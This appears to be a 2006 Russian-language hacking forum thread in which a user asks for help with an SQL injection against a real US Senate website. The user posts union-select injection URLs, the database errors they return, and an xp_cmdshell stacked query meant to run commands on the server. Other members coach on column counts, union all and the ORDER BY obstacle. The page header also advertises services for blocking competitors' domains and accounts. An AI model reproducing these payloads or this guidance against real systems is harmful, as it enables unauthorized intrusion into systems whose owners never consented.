Форум АНТИЧАТ - Помогите со Sql

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Помогите со Sql

Опции темы

Поиск в этой теме

Опции просмотра

Помогите со Sql

27.05.2006, 11:37

EST a1ien

Участник форума

Регистрация: 02.04.2006

Сообщений: 273

Провел на форуме:
1269624

Репутация: 114

Отправить сообщение для EST a1ien с помощью ICQ

Помогите со Sql

Код:

http://allard.senate.gov/public/index.cfm?FuseAction=Polls.Results&PollsPoll_id=-16+union+select+null,null,null,null--&IsPopUp=True

При таком вылетает

Цитата:

Error Executing Database Query. [Macromedia][SQLServer JDBC Driver][SQLServer]The text, ntext, or image data type cannot be selected as DISTINCT.

А при меньшем количестве столбцов вылетает

Цитата:

Error Executing Database Query. [Macromedia][SQLServer JDBC Driver][SQLServer]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists

Тоесть неподходит количестово столбцов.
В чём моя ошибка??

27.05.2006, 12:13

~~ZaCo~~

Banned

Регистрация: 20.06.2005

Сообщений: 880

Провел на форуме:
4610226

Репутация: 1332

если я не ошибаюсь то перед вставкой твоего параметра в конечный запрос идет order by то есть нормально заюзать union select не удастся, почему о невозможности юнион кричит только в начале хз. а вообщ если вылетает аткая ошибка ставь union all select

27.05.2006, 12:35

EST a1ien

Участник форума

Регистрация: 02.04.2006

Сообщений: 273

Провел на форуме:
1269624

Репутация: 114

Да ты прав там идёт order by.
А при вот таком запросе

Код:

_http://allard.senate.gov/public/index.cfm?FuseAction=Polls.Results&PollsPoll_id=-16+union+all+select+null,null,null,null,null,null,null,null,null--&IsPopUp=True

Тоесть воспользовался union all select но пришлось увеличить количество столюцов.
Вылетает вот такая ошибка

Цитата:

ORDER BY items must appear in the select list if the statement contains a UNION operator.

Еще пробовал вот такой запрос(как я понял там стоит mssql)

Цитата:

-16;exec%20master.xp_cmdshell%20%22dir%20%3E%20test .txt%22--

Вылетело

Цитата:

Incorrect syntax near the keyword 'ORDER'.
The error occurred on line 12.

И еще узнал
По какому полю делается ордер "DateCreated".

Последний раз редактировалось EST a1ien; 27.05.2006 в 12:41..

28.05.2006, 05:02

podkashey

Познавший АНТИЧАТ

Регистрация: 18.06.2005

Сообщений: 1,004

Провел на форуме:
2821162

Репутация: 1320

Цитата:

Как ьыть дальше?

скл подучить.
юнион селект, а не селект юнион.

28.05.2006, 22:12

Rebz

Super Moderator

Регистрация: 08.11.2004

Сообщений: 3,395

Провел на форуме:
13166814

Репутация: 3876

Цитата:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select union null,nulll,null,null/* and lang='ru' ORDER BY id' at line 1

1) убери ковычку
2) сначала идет оператор union а затем select
3) подбери нормально количество нулей -)

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая	k00p3r	Чужие Статьи	1	12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход